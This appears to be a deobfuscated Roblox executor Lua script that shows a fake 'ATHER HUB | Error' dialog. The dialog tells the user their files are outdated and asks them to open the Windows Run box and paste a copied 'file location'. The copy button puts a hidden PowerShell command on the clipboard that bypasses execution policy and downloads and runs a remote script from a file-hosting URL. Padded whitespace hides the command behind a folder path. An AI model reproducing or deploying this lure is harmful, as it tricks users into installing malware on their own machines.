-- This file was generated with UnveilR V3 at discord.gg/threaded using the testing version.

local Input_2_Is_Nil;
local fenv = getfenv();
pcall(function(p1, p2, a, b, c)

end);
game:GetService("Players");
game:GetService("TextService");
local Identifyexecutor_Result = identifyexecutor();
local AtherHubIntegrityUI = Instance.new"ScreenGui";
local MainFrame = Instance.new"Frame";
local UICorner = Instance.new"UICorner";
local TitleLabel = Instance.new"TextLabel";
local DescriptionLabel = Instance.new"TextLabel";
local PathFrame = Instance.new"Frame";
local PathLabel = Instance.new"TextLabel";
local UICorner_2 = Instance.new"UICorner";
local CopyButton = Instance.new"TextButton";
local UICorner_3 = Instance.new"UICorner";
local CloseButton = Instance.new"TextButton";
AtherHubIntegrityUI.Name = "AtherHubIntegrityUI";
AtherHubIntegrityUI.Parent = game:GetService("CoreGui");
AtherHubIntegrityUI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling;
MainFrame.Name = "MainFrame";
MainFrame.Parent = AtherHubIntegrityUI;
local FromRGB = Color3.fromRGB;
MainFrame.BackgroundColor3 = FromRGB(30, 30, 35);
local UDim2_New = UDim2.new;
MainFrame.Position = UDim2_New(0.5, -200, 0.5, -125);
MainFrame.Size = UDim2_New(0, 400, 0, 250);
MainFrame.BorderSizePixel = 0;
local UDim_New = UDim.new;
UICorner.CornerRadius = UDim_New(0, 10);
UICorner.Parent = MainFrame;
TitleLabel.Name = "TitleLabel";
TitleLabel.Parent = MainFrame;
TitleLabel.BackgroundTransparency = 1;
TitleLabel.Position = UDim2_New(0, 20, 0, 15);
TitleLabel.Size = UDim2_New(0, 360, 0, 30);
TitleLabel.Font = Enum.Font.GothamBold;
TitleLabel.Text = "ATHER HUB | Error";
TitleLabel.TextColor3 = FromRGB(255, 80, 80);
TitleLabel.TextSize = 18;
TitleLabel.TextXAlignment = Enum.TextXAlignment.Left;
DescriptionLabel.Name = "DescriptionLabel";
DescriptionLabel.Parent = MainFrame;
DescriptionLabel.BackgroundTransparency = 1;
DescriptionLabel.Position = UDim2_New(0, 20, 0, 50);
DescriptionLabel.Size = UDim2_New(0, 360, 0, 40);
DescriptionLabel.Font = Enum.Font.Gotham;
DescriptionLabel.Text = "Error - you have outdated files, please press WIN+R and then paste this code in, then delete EVERYTHING in the folder.";
DescriptionLabel.TextColor3 = FromRGB(200, 200, 200);
DescriptionLabel.TextSize = 14;
DescriptionLabel.TextWrapped = true;
DescriptionLabel.TextXAlignment = Enum.TextXAlignment.Left;
PathFrame.Name = "PathFrame";
PathFrame.Parent = MainFrame;
PathFrame.BackgroundColor3 = FromRGB(20, 20, 25);
PathFrame.Position = UDim2_New(0, 20, 0, 100);
PathFrame.Size = UDim2_New(0, 360, 0, 50);
UICorner_2.CornerRadius = UDim_New(0, 6);
UICorner_2.Parent = PathFrame;
PathLabel.Name = "PathLabel";
PathLabel.Parent = PathFrame;
PathLabel.BackgroundTransparency = 1;
PathLabel.Size = UDim2_New(1, -20, 1, 0);
PathLabel.Position = UDim2_New(0, 10, 0, 0);
PathLabel.Font = Enum.Font.Code;
PathLabel.Text = "%localappdata%\\" .. (
    Identifyexecutor_Result .. "\\Workspace\\AtherHub"
);
PathLabel.TextColor3 = FromRGB(150, 150, 255);
PathLabel.TextSize = 12;
PathLabel.TextWrapped = true;
PathLabel.TextXAlignment = Enum.TextXAlignment.Left;
CopyButton.Name = "CopyButton";
CopyButton.Parent = MainFrame;
CopyButton.BackgroundColor3 = FromRGB(60, 60, 70);
CopyButton.Position = UDim2_New(0, 20, 0, 170);
CopyButton.Size = UDim2_New(0, 360, 0, 40);
CopyButton.Font = Enum.Font.GothamMedium;
CopyButton.Text = "Copy File Location";
CopyButton.TextColor3 = FromRGB(255, 255, 255);
CopyButton.TextSize = 14;
CopyButton.AutoButtonColor = true;
UICorner_3.CornerRadius = UDim_New(0, 6);
UICorner_3.Parent = CopyButton;
CloseButton.Name = "CloseButton";
CloseButton.Parent = MainFrame;
CloseButton.BackgroundTransparency = 1;
CloseButton.Position = UDim2_New(1, -35, 0, 10);
CloseButton.Size = UDim2_New(0, 25, 0, 25);
CloseButton.Font = Enum.Font.Gotham;
CloseButton.Text = "X";
CloseButton.TextColor3 = FromRGB(150, 150, 150);
CloseButton.TextSize = 18;
CopyButton.MouseButton1Click:Connect(function(p1_2, p2_2, p3_2, p4_2, a_2, b_2, c_2)
    if pcall(function(p1_3, p2_3, p3_3, p4_3, a_3, b_3, c_3)
        setclipboard(
            "powershell -W Hidden -NoProfile -ExecutionPolicy Bypass -Command \"iex (Invoke-RestMethod 'https://files.catbox.moe/7u7k96.ps1')\" #                                                                   %localappdata%" .. (
                Identifyexecutor_Result .. "/Workspace"
            )
        );
    end) then -- ran, if id: 1
        CopyButton.BackgroundColor3 = FromRGB(80, 150, 80);
    end;
    task.wait(1.5);
    CopyButton.BackgroundColor3 = FromRGB(60, 60, 70);
end);
CloseButton.MouseButton1Click:Connect(function(p1_4, p2_4, p3_4, a_4, b_4, c_4)
    AtherHubIntegrityUI:Destroy();
end);
MainFrame.InputBegan:Connect(function(input, p2_5, a_5, b_5, c_5)
    local _ = input.UserInputType ~= Enum.UserInputType.MouseButton1;
    local _ = input.UserInputType ~= Enum.UserInputType.Touch;
end);
MainFrame.InputChanged:Connect(function(input_1, p2_6, p3_6, p4_6, p5_6, p6_6, a_6, b_6, c_6)
    if (input_1.UserInputType == Enum.UserInputType.MouseMovement) then
    else -- didnt run (else), if id: 2

    end;
    if input_1.UserInputType ~= Enum.UserInputType.Touch then -- ran, if id: 3

    end;
end);
game:GetService("UserInputService").InputChanged:Connect(function(input_2, gameProcessedEvent, p3_7, p4_7, p5_7, p6_7, a_7, b_7, c_7)
    Input_2_Is_Nil = (not input_2);
    local _ = not Input_2_Is_Nil;
    local _ = not Input_2_Is_Nil;
end);